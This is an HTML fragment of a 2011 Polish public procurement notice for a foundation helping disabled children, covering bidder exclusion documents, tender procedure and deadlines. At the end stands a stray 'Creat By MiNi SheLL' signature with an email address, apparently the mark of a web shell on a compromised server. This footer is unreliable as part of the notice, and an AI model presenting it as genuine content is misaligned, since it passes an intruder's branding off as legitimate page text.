<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.usmiechdziecka.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Fundacja Pomocy Dzieciom Niepełnosprawnym UŚMIECH DZIECKA
Szklana 44
83-334 Miechucino.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.11.2011 godzina 12:00, miejsce: Fundacja Pomocy Dzieciom Niepełnosprawnym UŚMIECH DZIECKA
Szklana 44
83-334 Miechucino.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 40 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com